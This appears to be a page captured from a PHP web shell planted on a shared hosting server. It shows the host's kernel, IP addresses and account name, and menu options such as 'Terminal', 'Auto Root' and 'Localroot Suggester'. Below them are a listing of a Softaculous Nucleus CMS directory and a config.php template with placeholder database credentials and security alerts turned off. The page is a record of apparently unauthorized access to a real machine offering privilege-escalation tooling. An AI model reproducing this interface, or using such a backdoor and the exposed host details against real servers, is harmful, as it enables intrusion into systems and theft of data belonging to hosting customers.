Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.209
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
nucleus /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-03-06 00:22
php53
[ DIR ]
drwxr-xr-x
2024-03-06 00:22
php56
[ DIR ]
drwxr-xr-x
2024-03-06 00:22
php71
[ DIR ]
drwxr-xr-x
2024-03-06 00:22
php81
[ DIR ]
drwxr-xr-x
2024-03-06 00:22
Notes.txt
188
B
-rw-r--r--
2021-12-23 11:54
clone.php
3.15
KB
-rw-r--r--
2022-09-21 09:13
config.php
1009
B
-rw-r--r--
2021-12-23 11:54
edit.php
4.39
KB
-rw-r--r--
2022-09-21 09:13
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
fileindex.php
250
B
-rw-r--r--
2021-12-23 11:54
import.php
3.26
KB
-rw-r--r--
2022-09-21 09:13
info.xml
2.05
KB
-rw-r--r--
2022-09-21 08:18
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
3.51
KB
-rw-r--r--
2022-09-21 09:13
install.xml
1.39
KB
-rw-r--r--
2021-12-23 11:54
md5
1002
B
-rw-r--r--
2022-09-21 09:13
upgrade.php
2.42
KB
-rw-r--r--
2022-09-21 09:13
upgrade.xml
375
B
-rw-r--r--
2021-12-23 11:54
Save
Rename
<?php // mySQL connection information $MYSQL_HOST = '[[softdbhost]]'; $MYSQL_USER = '[[softdbuser]]'; $MYSQL_PASSWORD = '[[softdbpass]]'; $MYSQL_DATABASE = '[[softdb]]'; $MYSQL_PREFIX = '[[dbprefix]]'; // new in 3.50. first element is db handler, the second is the db driver used by the handler // default is $MYSQL_HANDLER = array('mysql','mysql'); //$MYSQL_HANDLER = array('mysql','mysql'); //$MYSQL_HANDLER = array('pdo','mysql'); $MYSQL_HANDLER = array('mysql',''); // main nucleus directory $DIR_NUCLEUS = '[[softpath]]/nucleus/'; // path to media dir $DIR_MEDIA = '[[softpath]]/media/'; // extra skin files for imported skins $DIR_SKINS = '[[softpath]]/skins/'; // these dirs are normally sub dirs of the nucleus dir, but // you can redefine them if you wish $DIR_PLUGINS = $DIR_NUCLEUS . 'plugins/'; $DIR_LANG = $DIR_NUCLEUS . 'language/'; $DIR_LIBS = $DIR_NUCLEUS . 'libs/'; // include libs include($DIR_LIBS.'globalfunctions.php'); $CONF['alertOnSecurityRisk'] = 0; ?>